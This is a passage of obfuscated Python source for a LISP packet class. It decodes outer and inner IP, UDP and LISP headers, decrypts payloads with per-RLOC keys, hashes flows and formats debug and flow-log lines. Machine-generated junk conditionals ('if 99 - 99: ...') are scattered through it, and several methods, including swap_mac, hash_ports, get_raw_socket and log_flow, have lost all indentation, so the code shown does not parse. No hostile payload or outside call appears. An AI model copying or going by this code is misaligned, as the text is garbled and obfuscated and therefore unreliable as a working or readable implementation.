     if ( IIIII1II1111 != 0 or lisp_is_macos ( ) == False ) :
      self . packet_error = "checksum-error"
      if ( stats ) :
       stats [ self . packet_error ] . increment ( O0ooO )
       if 99 - 99: Oo0Ooo / I1Ii111 * Oo0Ooo / iIii1I11I1II1 * IiII
      if 99 - 99: iIii1I11I1II1 - ooOoO0o
      lprint ( "IPv4 header checksum failed for outer header" )
      if ( lisp_flow_logging ) : self . log_flow ( False )
      return ( None )
     if 79 - 79: I1IiiI + oO0o % I11i % oO0o
    if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
    if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
    oO0oO00 = LISP_AFI_IPV4
    i1 = 12
    self . outer_tos = struct . unpack ( "B" , ii1i1II [ 1 : 2 ] ) [ 0 ]
    self . outer_ttl = struct . unpack ( "B" , ii1i1II [ 8 : 9 ] ) [ 0 ]
    oO000O = 20
   elif ( self . outer_version == 6 ) :
    oO0oO00 = LISP_AFI_IPV6
    i1 = 8
    IiiI1Ii1II = struct . unpack ( "H" , ii1i1II [ 0 : 2 ] ) [ 0 ]
    self . outer_tos = ( socket . ntohs ( IiiI1Ii1II ) >> 4 ) & 0xff
    self . outer_ttl = struct . unpack ( "B" , ii1i1II [ 7 : 8 ] ) [ 0 ]
    oO000O = 40
   else :
    self . packet_error = "outer-header-error"
    if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
    lprint ( "Cannot decode outer header" )
    return ( None )
   if 74 - 74: oO0o / OoooooooOO % oO0o / iIii1I11I1II1 + O0
   if 95 - 95: Oo0Ooo * OOooOOo + I1IiiI . O0

   #
   # Pull the outer source/dest RLOC addresses, then strip the outer
   # IP header from the working buffer.
   #
   self . outer_source . afi = oO0oO00
   self . outer_dest . afi = oO0oO00
   IIiIi1II1IiI = self . outer_source . addr_length ( )
   if 99 - 99: Oo0Ooo
   self . outer_source . unpack_address ( ii1i1II [ i1 : i1 + IIiIi1II1IiI ] )
   i1 += IIiIi1II1IiI
   self . outer_dest . unpack_address ( ii1i1II [ i1 : i1 + IIiIi1II1IiI ] )
   ii1i1II = ii1i1II [ oO000O : : ]
   self . outer_source . mask_len = self . outer_source . host_mask_len ( )
   self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
   if 17 - 17: i11iIiiIii - i11iIiiIii + I1ii11iIi11i * ooOoO0o * oO0o / OoooooooOO
   if 22 - 22: I1Ii111 * I1ii11iIi11i - IiII
   if 71 - 71: iIii1I11I1II1 / i11iIiiIii % o0oOOo0O0Ooo . I1Ii111 * I1IiiI % II111iiii
   if 35 - 35: I1Ii111 - OoOoOO00

   #
   # Parse the 8-byte UDP header (fields arrive in network order) and
   # strip it from the working buffer.
   #
   O00OOOoOOOo0o = struct . unpack ( "H" , ii1i1II [ 0 : 2 ] ) [ 0 ]
   self . udp_sport = socket . ntohs ( O00OOOoOOOo0o )
   O00OOOoOOOo0o = struct . unpack ( "H" , ii1i1II [ 2 : 4 ] ) [ 0 ]
   self . udp_dport = socket . ntohs ( O00OOOoOOOo0o )
   O00OOOoOOOo0o = struct . unpack ( "H" , ii1i1II [ 4 : 6 ] ) [ 0 ]
   self . udp_length = socket . ntohs ( O00OOOoOOOo0o )
   O00OOOoOOOo0o = struct . unpack ( "H" , ii1i1II [ 6 : 8 ] ) [ 0 ]
   self . udp_checksum = socket . ntohs ( O00OOOoOOOo0o )
   ii1i1II = ii1i1II [ 8 : : ]
   if 41 - 41: I1Ii111 * I1Ii111 % I11i
   if 84 - 84: o0oOOo0O0Ooo
   if 67 - 67: I1ii11iIi11i - o0oOOo0O0Ooo
   if 40 - 40: I1IiiI / OoooooooOO + OoO0O00 * OoO0O00

   #
   # Classify the encapsulation by UDP port: LISP data versus
   # L2/VXLAN.
   #
   Iii1iIIIi11I1 = ( self . udp_dport == LISP_DATA_PORT or
   self . udp_sport == LISP_DATA_PORT )
   IIII11Ii1I11I = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
   if 9 - 9: iIii1I11I1II1
   if 57 - 57: ooOoO0o / Ii1I % o0oOOo0O0Ooo % i11iIiiIii
   if 95 - 95: I1Ii111 - o0oOOo0O0Ooo
   if 65 - 65: i11iIiiIii - OoooooooOO / O0 * IiII % I11i
   if ( self . lisp_header . decode ( ii1i1II ) == False ) :
    self . packet_error = "lisp-header-error"
    if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
    if 53 - 53: OOooOOo + I1Ii111
    if ( lisp_flow_logging ) : self . log_flow ( False )
    lprint ( "Cannot decode LISP header" )
    return ( None )
   if 10 - 10: I11i * i1IIi . oO0o / I1Ii111 . OOooOOo / I1Ii111
   ii1i1II = ii1i1II [ 8 : : ]
   oOo00Ooo0o0 = self . lisp_header . get_instance_id ( )
   oO000O += 16
   if 1 - 1: iII111i % ooOoO0o
   # Instance-id 0xffffff marks a control packet; treat it as iid 0.
   if ( oOo00Ooo0o0 == 0xffffff ) : oOo00Ooo0o0 = 0
   if 99 - 99: iII111i + iIii1I11I1II1 . OOooOOo / OoO0O00 * I1ii11iIi11i
   if 87 - 87: IiII / II111iiii % OoO0O00 % OoO0O00
   if 28 - 28: OoOoOO00 % oO0o - OOooOOo + OOooOOo + oO0o / iIii1I11I1II1
   if 91 - 91: I1IiiI / II111iiii * OOooOOo

   #
   # When the LISP header key-bits are set the payload is encrypted;
   # look up the decap crypto key and decrypt.
   #
   ooOoo000 = False
   o0O = self . lisp_header . k_bits
   if ( o0O ) :
    oOo0O = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
    self . udp_sport )
    if ( oOo0O == None ) :
     self . packet_error = "no-decrypt-key"
     if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
     if 11 - 11: OoooooooOO % Ii1I
     self . print_packet ( "Receive" , is_lisp_packet )
     oOoOo00oo = bold ( "No key available" , False )
     dprint ( "{} for key-id {} to decrypt packet" . format ( oOoOo00oo , o0O ) )
     if ( lisp_flow_logging ) : self . log_flow ( False )
     return ( None )
    if 32 - 32: I1IiiI * I1Ii111 * i1IIi + oO0o
    if 40 - 40: II111iiii
    iII1 = lisp_crypto_keys_by_rloc_decap [ oOo0O ] [ o0O ]
    if ( iII1 == None ) :
     self . packet_error = "no-decrypt-key"
     if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
     if 7 - 7: I1ii11iIi11i - iIii1I11I1II1
     self . print_packet ( "Receive" , is_lisp_packet )
     oOoOo00oo = bold ( "No key available" , False )
     dprint ( "{} to decrypt packet from RLOC {}" . format ( oOoOo00oo ,
     red ( oOo0O , False ) ) )
     if ( lisp_flow_logging ) : self . log_flow ( False )
     return ( None )
    if 97 - 97: OOooOOo
    if 41 - 41: OoooooooOO - Oo0Ooo * iIii1I11I1II1 . i1IIi
    if 39 - 39: Ii1I % i1IIi . I1ii11iIi11i - O0
    if 65 - 65: oO0o * oO0o / I11i + oO0o % ooOoO0o + OoOoOO00
    if 92 - 92: o0oOOo0O0Ooo
    iII1 . use_count += 1
    ii1i1II , ooOoo000 = self . decrypt ( ii1i1II , oO000O , iII1 ,
    oOo0O )
    if ( ooOoo000 == False ) :
     if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
     if ( lisp_flow_logging ) : self . log_flow ( False )
     return ( None )
    if 37 - 37: oO0o
   if 18 - 18: IiII * i11iIiiIii + iIii1I11I1II1 % I11i + i1IIi - OoO0O00
  if 85 - 85: OoO0O00 * I11i + OoO0O00
  if 39 - 39: Oo0Ooo / i1IIi % i1IIi
  if 20 - 20: OOooOOo * oO0o
  if 91 - 91: OoO0O00 % i1IIi - iIii1I11I1II1 . OOooOOo

  #
  # Parse the inner header: IPv4, IPv6, a MAC frame (L2/VXLAN ports),
  # or a LISP control packet (instance-id 0xffffff).
  #
  Oo0o0OoOoOo0 = struct . unpack ( "B" , ii1i1II [ 0 : 1 ] ) [ 0 ]
  self . inner_version = Oo0o0OoOoOo0 >> 4
  if ( Iii1iIIIi11I1 and self . inner_version == 4 and Oo0o0OoOoOo0 >= 0x45 ) :
   IIiiIiIIiI1 = socket . ntohs ( struct . unpack ( "H" , ii1i1II [ 2 : 4 ] ) [ 0 ] )
   self . inner_tos = struct . unpack ( "B" , ii1i1II [ 1 : 2 ] ) [ 0 ]
   self . inner_ttl = struct . unpack ( "B" , ii1i1II [ 8 : 9 ] ) [ 0 ]
   self . inner_protocol = struct . unpack ( "B" , ii1i1II [ 9 : 10 ] ) [ 0 ]
   self . inner_source . afi = LISP_AFI_IPV4
   self . inner_dest . afi = LISP_AFI_IPV4
   self . inner_source . unpack_address ( ii1i1II [ 12 : 16 ] )
   self . inner_dest . unpack_address ( ii1i1II [ 16 : 20 ] )
   i111IiIi1 = socket . ntohs ( struct . unpack ( "H" , ii1i1II [ 6 : 8 ] ) [ 0 ] )
   self . inner_is_fragment = ( i111IiIi1 & 0x2000 or i111IiIi1 != 0 )
   if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
    self . inner_sport = struct . unpack ( "H" , ii1i1II [ 20 : 22 ] ) [ 0 ]
    self . inner_sport = socket . ntohs ( self . inner_sport )
    self . inner_dport = struct . unpack ( "H" , ii1i1II [ 22 : 24 ] ) [ 0 ]
    self . inner_dport = socket . ntohs ( self . inner_dport )
   if 39 - 39: I11i / OoooooooOO - Ii1I + OoO0O00 / OoOoOO00
  elif ( Iii1iIIIi11I1 and self . inner_version == 6 and Oo0o0OoOoOo0 >= 0x60 ) :
   IIiiIiIIiI1 = socket . ntohs ( struct . unpack ( "H" , ii1i1II [ 4 : 6 ] ) [ 0 ] ) + 40
   IiiI1Ii1II = struct . unpack ( "H" , ii1i1II [ 0 : 2 ] ) [ 0 ]
   self . inner_tos = ( socket . ntohs ( IiiI1Ii1II ) >> 4 ) & 0xff
   self . inner_ttl = struct . unpack ( "B" , ii1i1II [ 7 : 8 ] ) [ 0 ]
   self . inner_protocol = struct . unpack ( "B" , ii1i1II [ 6 : 7 ] ) [ 0 ]
   self . inner_source . afi = LISP_AFI_IPV6
   self . inner_dest . afi = LISP_AFI_IPV6
   self . inner_source . unpack_address ( ii1i1II [ 8 : 24 ] )
   self . inner_dest . unpack_address ( ii1i1II [ 24 : 40 ] )
   if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
    self . inner_sport = struct . unpack ( "H" , ii1i1II [ 40 : 42 ] ) [ 0 ]
    self . inner_sport = socket . ntohs ( self . inner_sport )
    self . inner_dport = struct . unpack ( "H" , ii1i1II [ 42 : 44 ] ) [ 0 ]
    self . inner_dport = socket . ntohs ( self . inner_dport )
   if 87 - 87: I1Ii111
  elif ( IIII11Ii1I11I ) :
   IIiiIiIIiI1 = len ( ii1i1II )
   self . inner_tos = 0
   self . inner_ttl = 0
   self . inner_protocol = 0
   self . inner_source . afi = LISP_AFI_MAC
   self . inner_dest . afi = LISP_AFI_MAC
   self . inner_dest . unpack_address ( self . swap_mac ( ii1i1II [ 0 : 6 ] ) )
   self . inner_source . unpack_address ( self . swap_mac ( ii1i1II [ 6 : 12 ] ) )
  elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
   if ( lisp_flow_logging ) : self . log_flow ( False )
   return ( self )
  else :
   self . packet_error = "bad-inner-version"
   if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
   if 32 - 32: I11i - OOooOOo * O0 % IiII . IiII . I1IiiI
   lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( Oo0o0OoOoOo0 ) ) )
   if 91 - 91: i1IIi . iII111i
   ii1i1II = lisp_format_packet ( ii1i1II [ 0 : 20 ] )
   lprint ( "Packet header: {}" . format ( ii1i1II ) )
   if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
   return ( None )
  if 37 - 37: iII111i - I11i + iIii1I11I1II1 / I1Ii111 - OoO0O00 . o0oOOo0O0Ooo
  self . inner_source . mask_len = self . inner_source . host_mask_len ( )
  self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
  self . inner_source . instance_id = oOo00Ooo0o0
  self . inner_dest . instance_id = oOo00Ooo0o0
  if 62 - 62: I1ii11iIi11i
  if 47 - 47: I1Ii111 % OOooOOo * OoO0O00 . iIii1I11I1II1 % Oo0Ooo + OoooooooOO
  if 2 - 2: I1Ii111 % OoooooooOO - ooOoO0o * I1ii11iIi11i * IiII
  if 99 - 99: iIii1I11I1II1 . Oo0Ooo / ooOoO0o . OOooOOo % I1IiiI * I11i
  if 95 - 95: oO0o

  #
  # Nonce-echo bookkeeping: process an echo request (E-bit) or a
  # returned echo from the outer source RLOC.
  #
  if ( lisp_nonce_echoing and is_lisp_packet ) :
   oOo0ooO0O0oo = lisp_get_echo_nonce ( self . outer_source , None )
   if ( oOo0ooO0O0oo == None ) :
    ii11IiI = self . outer_source . print_address_no_iid ( )
    oOo0ooO0O0oo = lisp_echo_nonce ( ii11IiI )
   if 14 - 14: I11i - Oo0Ooo . Oo0Ooo * OOooOOo . I1IiiI % iII111i
   OO00OO = self . lisp_header . get_nonce ( )
   if ( self . lisp_header . is_e_bit_set ( ) ) :
    oOo0ooO0O0oo . receive_request ( lisp_ipc_socket , OO00OO )
   elif ( oOo0ooO0O0oo . request_nonce_sent ) :
    oOo0ooO0O0oo . receive_echo ( lisp_ipc_socket , OO00OO )
   if 27 - 27: O0 * I1IiiI - iIii1I11I1II1 - iII111i % O0 . Oo0Ooo
  if 16 - 16: IiII % i11iIiiIii . IiII % OoooooooOO - oO0o
  if 88 - 88: Ii1I * iIii1I11I1II1 . I11i
  if 20 - 20: O0 . i11iIiiIii * i1IIi % O0 . I1IiiI
  if 53 - 53: ooOoO0o / OoooooooOO - II111iiii
  if 68 - 68: OoooooooOO . OoooooooOO . iIii1I11I1II1 / ooOoO0o - I11i % O0
  if 19 - 19: OoooooooOO * oO0o

  #
  # When decryption occurred, append the decrypted payload (truncated
  # to the inner header length) onto self.packet.  NOTE(review):
  # presumably self.decrypt() left self.packet holding only the outer
  # headers -- confirm against decrypt()'s implementation.
  #
  if ( ooOoo000 ) : self . packet += ii1i1II [ : IIiiIiIIiI1 ]
  if 60 - 60: II111iiii - iII111i + o0oOOo0O0Ooo % OOooOOo
  if 97 - 97: O0 % O0
  if 35 - 35: iII111i - Ii1I . i11iIiiIii % O0 % I1ii11iIi11i
  if 92 - 92: OOooOOo % II111iiii . iII111i
  if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
  return ( self )
if 46 - 46: OoOoOO00 + I1IiiI % OoooooooOO * i11iIiiIii - Oo0Ooo
if 47 - 47: iII111i * OoOoOO00 * IiII
def swap_mac ( self , mac ) :
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
if 46 - 46: Ii1I
if 42 - 42: iIii1I11I1II1
def strip_outer_headers ( self ) :
i1 = 16
i1 += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ i1 : : ]
return ( self )
if 32 - 32: Oo0Ooo - Ii1I . OoooooooOO - OoooooooOO - Oo0Ooo . iIii1I11I1II1
if 34 - 34: Oo0Ooo
def hash_ports ( self ) :
ii1i1II = self . packet
Oo0o0OoOoOo0 = self . inner_version
IiI1I1i1 = 0
if ( Oo0o0OoOoOo0 == 4 ) :
Iii11I = struct . unpack ( "B" , ii1i1II [ 9 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( Iii11I )
if ( Iii11I in [ 6 , 17 ] ) :
IiI1I1i1 = Iii11I
IiI1I1i1 += struct . unpack ( "I" , ii1i1II [ 20 : 24 ] ) [ 0 ]
IiI1I1i1 = ( IiI1I1i1 >> 16 ) ^ ( IiI1I1i1 & 0xffff )
if 2 - 2: oO0o . OOooOOo
if 43 - 43: iIii1I11I1II1
if ( Oo0o0OoOoOo0 == 6 ) :
Iii11I = struct . unpack ( "B" , ii1i1II [ 6 ] ) [ 0 ]
if ( Iii11I in [ 6 , 17 ] ) :
IiI1I1i1 = Iii11I
IiI1I1i1 += struct . unpack ( "I" , ii1i1II [ 40 : 44 ] ) [ 0 ]
IiI1I1i1 = ( IiI1I1i1 >> 16 ) ^ ( IiI1I1i1 & 0xffff )
if 29 - 29: IiII % ooOoO0o + OoO0O00 . i1IIi + I1IiiI
if 24 - 24: I1Ii111 / Ii1I * I1ii11iIi11i - OoooooooOO / I1IiiI . oO0o
return ( IiI1I1i1 )
if 98 - 98: i1IIi - iII111i
if 49 - 49: o0oOOo0O0Ooo . Ii1I . oO0o
def hash_packet ( self ) :
IiI1I1i1 = self . inner_source . address ^ self . inner_dest . address
IiI1I1i1 += self . hash_ports ( )
if ( self . inner_version == 4 ) :
IiI1I1i1 = ( IiI1I1i1 >> 16 ) ^ ( IiI1I1i1 & 0xffff )
elif ( self . inner_version == 6 ) :
IiI1I1i1 = ( IiI1I1i1 >> 64 ) ^ ( IiI1I1i1 & 0xffffffffffffffff )
IiI1I1i1 = ( IiI1I1i1 >> 32 ) ^ ( IiI1I1i1 & 0xffffffff )
IiI1I1i1 = ( IiI1I1i1 >> 16 ) ^ ( IiI1I1i1 & 0xffff )
if 9 - 9: IiII - II111iiii * OoO0O00
self . udp_sport = 0xf000 | ( IiI1I1i1 & 0xfff )
if 78 - 78: iIii1I11I1II1 / O0 * oO0o / iII111i / OoOoOO00
if 15 - 15: ooOoO0o / oO0o
 def print_packet ( self , s_or_r , is_lisp_packet ) :

  #
  # Log a one-line human-readable summary of this packet via dprint().
  # s_or_r is a direction tag ("Send", "Receive", "Replicate",
  # "Fragment-...").  Non-LISP packets log only the inner header.
  #
  if ( is_lisp_packet == False ) :
   O0Oo00o0o = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
   self . inner_dest . print_address ( ) )
   dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
   # iII111i + II111iiii . i11iIiiIii . Ii1I - O0
   green ( O0Oo00o0o , False ) , self . inner_tos ,
   self . inner_ttl , len ( self . packet ) ,
   lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
   return
  if 47 - 47: oO0o . I1ii11iIi11i - iIii1I11I1II1 % II111iiii / OoOoOO00 % OoooooooOO
  if 13 - 13: IiII . Oo0Ooo - I11i / oO0o - Oo0Ooo - I1IiiI

  #
  # Map the direction tag to an encap/decap label for the LISP header
  # summary line.
  #
  if ( s_or_r . find ( "Receive" ) != - 1 ) :
   oOO0o = "decap"
   oOO0o += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
  else :
   oOO0o = s_or_r
   if ( oOO0o in [ "Send" , "Replicate" ] or oOO0o . find ( "Fragment" ) != - 1 ) :
    oOO0o = "encap"
  if 72 - 72: O0
  if 7 - 7: o0oOOo0O0Ooo
  o0OO0OOOOOo = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
  self . outer_dest . print_address_no_iid ( ) )
  if 83 - 83: iIii1I11I1II1 + II111iiii * oO0o / O0 - iII111i
  if 23 - 23: i1IIi
  if 24 - 24: IiII
  if 51 - 51: OOooOOo % i11iIiiIii
  if 77 - 77: OOooOOo % i11iIiiIii - I1ii11iIi11i
  # Instance-id 0xffffff identifies a LISP control packet; it is
  # logged without inner-header details.
  if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
   I111 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
   if 21 - 21: I11i . Oo0Ooo - OoooooooOO * i1IIi
   I111 += bold ( "control-packet" , False ) + ": {} ..."
   if 54 - 54: II111iiii % o0oOOo0O0Ooo - i1IIi . I1IiiI - II111iiii / iIii1I11I1II1
   dprint ( I111 . format ( bold ( s_or_r , False ) , red ( o0OO0OOOOOo , False ) ,
   self . outer_tos , self . outer_ttl , self . udp_sport ,
   self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
   return
  else :
   I111 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
   if 29 - 29: oO0o
  if 66 - 66: OoooooooOO + iII111i . IiII % i1IIi
  if 58 - 58: OOooOOo % iII111i * O0 + I1ii11iIi11i - IiII
  if 26 - 26: i1IIi / I1IiiI / I11i + I11i
  # Key-bits set means the payload is encrypted; reflect that in the
  # encap/decap label.
  if ( self . lisp_header . k_bits ) :
   if ( oOO0o == "encap" ) : oOO0o = "encrypt/encap"
   if ( oOO0o == "decap" ) : oOO0o = "decap/decrypt"
  if 46 - 46: I1Ii111 % I1ii11iIi11i + Ii1I
  if 67 - 67: iIii1I11I1II1 . i11iIiiIii . i11iIiiIii . i11iIiiIii / I11i + ooOoO0o
  O0Oo00o0o = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
  self . inner_dest . print_address ( ) )
  if 10 - 10: ooOoO0o - Oo0Ooo % II111iiii
  dprint ( I111 . format ( bold ( s_or_r , False ) , red ( o0OO0OOOOOo , False ) ,
  self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
  green ( O0Oo00o0o , False ) , self . inner_tos , self . inner_ttl ,
  len ( self . packet ) , self . lisp_header . print_header ( oOO0o ) ,
  lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
if 46 - 46: I1Ii111 * oO0o . Ii1I * I1Ii111 * iIii1I11I1II1 / I11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
if 46 - 46: II111iiii % I1ii11iIi11i . OOooOOo . Oo0Ooo / i11iIiiIii + OoO0O00
if 47 - 47: IiII . OOooOOo
def get_raw_socket ( self ) :
oOo00Ooo0o0 = str ( self . lisp_header . get_instance_id ( ) )
if ( oOo00Ooo0o0 == "0" ) : return ( None )
if ( lisp_iid_to_interface . has_key ( oOo00Ooo0o0 ) == False ) : return ( None )
if 96 - 96: I11i % II111iiii / ooOoO0o % OOooOOo / ooOoO0o % i11iIiiIii
I1i = lisp_iid_to_interface [ oOo00Ooo0o0 ]
o0 = I1i . get_socket ( )
if ( o0 == None ) :
IIIiiiI1Ii1 = bold ( "SO_BINDTODEVICE" , False )
O0000ooO = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( IIIiiiI1Ii1 , "drop" if O0000ooO else "forward" ) )
if 83 - 83: I1Ii111 + o0oOOo0O0Ooo % oO0o / OoO0O00
if ( O0000ooO ) : return ( None )
if 59 - 59: Ii1I * OOooOOo . IiII
if 68 - 68: O0 * iIii1I11I1II1 / I1Ii111
oOo00Ooo0o0 = bold ( oOo00Ooo0o0 , False )
Ii = bold ( I1i . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( oOo00Ooo0o0 , Ii ) )
return ( o0 )
if 65 - 65: OOooOOo - I1IiiI * I1Ii111
if 99 - 99: I1IiiI
def log_flow ( self , encap ) :
global lisp_flow_log
if 64 - 64: I1ii11iIi11i * Ii1I * Oo0Ooo % IiII % ooOoO0o
OoO0000O = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or OoO0000O ) :
I1I1iI = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = I1I1iI ) . start ( )
if ( OoO0000O ) : os . system ( "rm ./log-flows" )
return
if 41 - 41: oO0o . iII111i + OoooooooOO * Ii1I . o0oOOo0O0Ooo
if 11 - 11: O0
Oo0OO0000oooo = datetime . datetime . now ( )
lisp_flow_log . append ( [ Oo0OO0000oooo , encap , self . packet , self ] )
if 96 - 96: iII111i + o0oOOo0O0Ooo
if 10 - 10: i11iIiiIii . OoooooooOO . O0 % ooOoO0o / OoO0O00
 def print_flow ( self , ts , encap , packet ) :

  #
  # Render one flow-log entry as a text line: timestamp, direction,
  # outer RLOC/port addressing, then inner EID addressing with
  # per-protocol details.  Returns the formatted line (with trailing
  # newline).
  #
  ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
  iiIiIIIIiI = "{}: {}" . format ( ts , "encap" if encap else "decap" )
  if 4 - 4: I11i . IiII
  I1I = red ( self . outer_source . print_address_no_iid ( ) , False )
  IiiI1II = red ( self . outer_dest . print_address_no_iid ( ) , False )
  I1I1i1ii11 = green ( self . inner_source . print_address ( ) , False )
  ii = green ( self . inner_dest . print_address ( ) , False )
  if 87 - 87: OoO0O00 * OoOoOO00 - Oo0Ooo % OOooOOo * i11iIiiIii
  # Control packets (instance-id 0xffffff) log only outer addressing
  # and the message type.
  if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
   iiIiIIIIiI += " {}:{} -> {}:{}, LISP control message type {}\n"
   iiIiIIIIiI = iiIiIIIIiI . format ( I1I , self . udp_sport , IiiI1II , self . udp_dport ,
   self . inner_version )
   return ( iiIiIIIIiI )
  if 59 - 59: I1Ii111 + OoooooooOO / I1IiiI / OoooooooOO . iII111i
  if 20 - 20: Ii1I . I1Ii111 % Ii1I
  # Include outer-header details only when an outer destination is
  # present.
  if ( self . outer_dest . is_null ( ) == False ) :
   iiIiIIIIiI += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
   iiIiIIIIiI = iiIiIIIIiI . format ( I1I , self . udp_sport , IiiI1II , self . udp_dport ,
   len ( packet ) , self . outer_tos , self . outer_ttl )
   if 5 - 5: OOooOOo + iII111i
   if 23 - 23: I1Ii111 % iIii1I11I1II1 . I11i
   if 95 - 95: Oo0Ooo + i11iIiiIii % OOooOOo - oO0o
   if 11 - 11: I1ii11iIi11i / O0 + II111iiii
   if 95 - 95: I1Ii111 + IiII * iIii1I11I1II1
   # Encrypted payloads cannot be parsed further; finish the line
   # here (noting any packet error).
   if ( self . lisp_header . k_bits != 0 ) :
    II1Iii1iI = "\n"
    if ( self . packet_error != "" ) :
     II1Iii1iI = " ({})" . format ( self . packet_error ) + II1Iii1iI
    if 56 - 56: iIii1I11I1II1 . I11i
    iiIiIIIIiI += ", encrypted" + II1Iii1iI
    return ( iiIiIIIIiI )
  if 2 - 2: Ii1I
  if 12 - 12: i11iIiiIii - iIii1I11I1II1 * IiII * iII111i
  if 19 - 19: O0 + oO0o + o0oOOo0O0Ooo
  if 81 - 81: iIii1I11I1II1
  if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
  # Skip past the outer IP/UDP/LISP headers to reach the inner packet.
  if ( self . outer_dest . is_null ( ) == False ) :
   packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
  if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
  if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
  Iii11I = packet [ 9 ] if self . inner_version == 4 else packet [ 6 ]
  Iii11I = struct . unpack ( "B" , Iii11I ) [ 0 ]
  if 7 - 7: IiII
  iiIiIIIIiI += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
  iiIiIIIIiI = iiIiIIIIiI . format ( I1I1i1ii11 , ii , len ( packet ) , self . inner_tos ,
  self . inner_ttl , Iii11I )
  if 15 - 15: Oo0Ooo + iII111i + I1IiiI * o0oOOo0O0Ooo
  if 33 - 33: o0oOOo0O0Ooo * Oo0Ooo
  if 88 - 88: I1Ii111 % OOooOOo - OoOoOO00 - OoOoOO00 . I1IiiI
  if 52 - 52: II111iiii / II111iiii / I1IiiI - I1Ii111
  # TCP/UDP (protocol 6/17): append the port pair; ICMP (protocol 1):
  # append the echo sequence number.
  if ( Iii11I in [ 6 , 17 ] ) :
   Oo0OOoI1i1i1IIi1I = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
   if ( len ( Oo0OOoI1i1i1IIi1I ) == 4 ) :
    Oo0OOoI1i1i1IIi1I = socket . ntohl ( struct . unpack ( "I" , Oo0OOoI1i1i1IIi1I ) [ 0 ] )
    iiIiIIIIiI += ", ports {} -> {}" . format ( Oo0OOoI1i1i1IIi1I >> 16 , Oo0OOoI1i1i1IIi1I & 0xffff )
   if 18 - 18: oO0o * Ii1I / OoooooooOO % OoOoOO00 - i1IIi
  elif ( Iii11I == 1 ) :
   iIiIi111 = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
   if ( len ( iIiIi111 ) == 2 ) :
    iIiIi111 = socket . ntohs ( struct . unpack ( "H" , iIiIi111 ) [ 0 ] )
    iiIiIIIIiI += ", icmp-seq {}" . format ( iIiIi111 )
  if 1 - 1: I1Ii111 * OoOoOO00
  if 100 - 100: I1ii11iIi11i / O0 / ooOoO0o + I1ii11iIi11i
  if ( self . packet_error != "" ) :
   iiIiIIIIiI += " ({})" . format ( self . packet_error )
  if 48 - 48: OoooooooOO . iII111i + O0
  iiIiIIIIiI += "\n"
  return ( iiIiIIIIiI )
if 85 - 85: II111iiii - Ii1I
if 93 - 93: IiII / i11iIiiIii - oO0o + OoO0O00 / i1IIi
def is_trace ( self ) :
Oo0OOoI1i1i1IIi1I = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in Oo0OOoI1i1i1IIi1I )
if 62 - 62: I1ii11iIi11i / OoooooooOO * I1IiiI - i1IIi
if 81 - 81: oO0o / O0 * ooOoO0o % OoOoOO00 / O0
if 85 - 85: OoooooooOO + OoooooooOO
if 23 - 23: i1IIi
if 31 - 31: Oo0Ooo - iIii1I11I1II1 / I11i . OoO0O00
if 74 - 74: Oo0Ooo - II111iiii - IiII
